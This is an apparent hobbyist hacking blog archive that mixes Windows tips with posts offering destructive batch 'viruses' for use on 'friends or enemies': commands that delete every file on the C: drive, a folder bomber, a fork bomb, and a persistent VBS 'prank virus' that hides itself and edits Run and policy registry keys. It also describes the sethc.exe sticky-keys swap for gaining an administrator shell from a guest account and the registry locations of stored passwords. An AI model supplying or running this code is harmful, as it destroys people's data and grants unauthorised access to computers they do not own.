Sunday, October 9, 2016
CREATE A DANGEROUS VIRUS USING NOTEPAD
Wednesday, November 4, 2015
Where The Saved Passwords Stores In Windows Xp & Vista
Note : Educational purposes only
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.
You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.
1. AutoComplete passwords are stored in the Registry under
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
Documents and Settings\Application Data\Microsoft\Credentials
Friday, July 17, 2015
Top 5 Most Awesome Computer Pranks
1. Changing The Keyboard Layout.
Thursday, June 12, 2014
HOW TO HIDE TEXT IN IMAGE FILE
Hi Guys.
Today we will see how to hide Text
Message in any image file.
This is an awesome trick and very easy one too.
IF you wish to send a text message to you friends privately or you yourself want to hide a text message in image file then this article will help you a lot.
After hiding the message in a image file there will be no damage to the file just the size of the file will increase a bit.
So lets check how it is done.
*First of all open run and type cmd., click enter.
*This will open Command promt.
*Now you have to navigate to the folder where you have copied the files(1 .jpg file and 1 txt file which
contains your message.)
For example, if your files are in “D” drive, then after opening cmd, type, D: and hit enter, now you are in your d drive, now if your folder name is
Photos then type “cd photos” (without quotes) now you are in photos folder.
*Now main step. Type this command after navigating to the folder. copy /b imagefilename.jpg + textfilename.txt
outputimagename.jpg
*Type the exact code, but dont forgot to replace the few words, imagefilename.jpg with your image
file name and with proper extension,
textfilename.txt with your text file,
outputimagename.jpg your output image name, use whatever you want, but remember to use right
extension.
*All done by now your message has been hidden in you image and a new folder will be created in the same folder with the name you wrote in place of outputimagename.jpg.
*As everything is done by now. you must be thinking how to view the message now. don't worry we will see that too. its very simple .
You just have to open the output file with notepad , scroll down to the bottom. check the last line.
you message will be displayed there.
Friday, December 13, 2013
Funny BAT Files for Pranks or Serious Damage to a PC
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2) Stupid Shutdown – Shows a funny Error and shutdowns the PC
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
Thursday, November 14, 2013
HOW TO KNOW "ADMIN PArSSWORD" THROUGH GUEST ACCOUNT
If you been using someones Pc in guest account and want to have Admin privilage then worry not,there is a trick for you to Gain Admin Privilage .
lets get started with it.
Method 1.
1) Go to C:/windows/system32.
2) Copy cmd.exe and paste it on desktop.
3) Rename cmd.exe to sethc.exe.
4) Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
5) Now Log out from your guest account and at the user select window,press shift key 5 times.
6) Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.
Monday, September 9, 2013
Getting an Email Alert (with Picture) When Someone Tries to Log into your Computer
Friday, September 6, 2013
How to create your own run commands
To open the RUN window simply press Windows key and then R key on your keyboard. (i.e. Window+R).
Then type any program name that you want to execute and you are done the program will start running. But the drawback is that there are only few inbuilt programs which can be used via this method. But here I am showing you the trick to create commands that are not built in within the windows and you can run any of the software by typing any keyword you wish to assign to that software.
Wednesday, September 4, 2013
No-wait Screen Savers
Tuesday, September 3, 2013
All (Ctrl+Alt+Del) Permanently deleted files Recovery solution
Monday, September 2, 2013
DEADLY BATCH FILE TRICKS THAT YOU SHOULD NEVER TRY ON YOUR PC

In this tutorial I'm going to explain some deadly batch file tricks and hacks that can completely destroy your Windows Registry, You have to re-format your computer to bring it back to normal. Batch files discussed in this post can create a real havoc on your computer, they can completely irritate you so don't try them on your PC.
Use them on your friends or enemies computer.
1. Crash a Computer with just a link
Click Here (http://tiny.cc/ibJUN)
2. Folder Bomber
This batch file will create 3000+ folder in less than a minute.
Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top
Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.
Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and
%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.
2. Fork Bomber
It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste
the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />
3. Getting Blue Screen Of Death (BOSD)
You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever
you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to
crash your Windows box.
Method 1: Windows Built-in Self Crasher
This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to
reboot it. Just follow these steps:
Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC
Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key
twice.
3. Prank Virus
Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.
@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo LOOP>>1234.vbs
copy /y 123.vbs C:\
copy /y 1234.vbs C:\
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 1
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
start 123.vbs
start 1234.vbs
echo Code Smahser owns your computer!!>>c:\almasmalik.txt
echo Code Smahser owns your computer!!>>d:\almasmalik.txt
echo Code Smahser owns your computer!!>>e:\almasmalik.txt
msg * MAY YOUR COMPUTER "REST IN PEACE"
5. Open Command Prompt Window infinite times untill your Computer Crashes
Just copy and paste the below codes to make your computer crash. (After you will restart your computer, it will be back to normal)
@echo off
:loop
start cmd.exe
goto loop
"cmd.exe" can be changed to any other program also like Calculator. For calculator use calc.exe, for My Computer use explorer.exe and so on.
How to Make the virus ?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Make a virus that disable Mouse
Virus to Format Hard Disk !!!
Sunday, September 1, 2013
How To Reinstall Windows XP Without Having to Reactivate With Microsoft
Saturday, August 31, 2013
2 ways to install Android Apps on windows XP,Windows 8, Windows 7
What is Android?
Android is a Linux-based operating system designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc.Android is open source and Google releases the code under the Apache License. This open-source code and permissive licensing allows the software to be freely modified and distributed by device manufacturers, wireless carriers and enthusiast developers.What is Android Application?
A mobile software application developed for use on devices powered by Google's Android platform. Android apps are available in the Google PlayStore (formerly known as the Android Market), in the Amazon Appstore and on various Android App-focused sites, and the apps can run on Android smartphones, tablets, Google TV and other devices.These days’ people are really going crazy behind Android apps. There are hell lot of games and applications available for android plat form which makes users to stick on to their mobiles. Even the people who don’t own a Android mobile are also showing interest to use android apps. If you are one among those who don’t own a Android mobile but Still want to use Android apps on Windows 8 or Android on windows 7, then this post will be very helpful to you.
Friday, August 30, 2013
Have a Personalized Logon Wallpaper in Windows XP
To use this trick, you need to have a bmp file. If your image is of any other format, you can save it in bmp format using MS Paint.
Thursday, August 29, 2013
Enable Registry Editor disabled by Administrator or Virus
Registry Editor is a useful utility in Windows which allows users to easily change advanced Windows settings by altering registry keys present in a hierarchical arrangement called the Windows Registry. Despite being such a powerful tool, Registry Editor is not totally error-proof.A simple virus infection is all it takes to render it useless. Or, there are times when your administrator has actually disabled Registry Editing. When you try to open the Registry Editor in one such computer, you are likely to receive the“Registry editing has been disabled by your administrator” error. Due to this error, it is impossible to remove this restriction using Registry Editor itself.
This article suggests some workarounds for re-enabling Registry editing in a computer running Windows XP, Windows Vista, Windows Server 2003/ 2008, Windows 7 or Windows 8.
Wednesday, August 28, 2013
Add Background Images to Folders in Windows
It is relatively easy to add background images to folders using a simple desktop.ini trick just as easily as you can change your Desktop's background.
Desktop.ini is a system file that is used to customize the appearance and behavior of folders in Windows. We can use this ability of desktop.ini files to add backgrounds to folders just by adding a few lines of code.
![]() |
| This is how the background in folder looks like. |
Monday, August 26, 2013
Make Undeletable, Unrenamable Folders
Basic Concept
The basic concept behind this trick is the use of Keywords. Keywords are reserved words in any programming language that cannot be used as names of variables. Windows also uses certain keywords in its programming. Some of them are con, aux, lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8 and lpt9.
Saturday, August 24, 2013
Enable Task Manager disabled by Administrator or Virus in Windows
In such situations, running the Task Manager will give the "Task Manager has been disabled by Administrator" error. However, there are some techniques you can use to re-enable task manager and close those harmful programs manually. This article contains few such simple techniques you can use to regain access to Task Managing privileges.
Friday, August 23, 2013
Enable Command Prompt Disabled by Administrator or Virus
In these situations, if you run the command prompt (cmd.exe), you will get an error saying "The command prompt has been disabled your Administrator". However, there are ways in which you can re-enable it. This article contains some such few simple techniques using which you can easily enable the command prompt.
Thursday, August 22, 2013
How To Use Your USB/Pen Drive As Ram
So let’s begin.Increasing the PC’s RAM using USB Flash Drive will help also enhance Game performance and decrease the time of execution of some tasks made by software.A) For WIN7/VISTA
1. Insert your pen drive and then format it.
2. Right click on your pen drive and then click on properties.

.jpg)


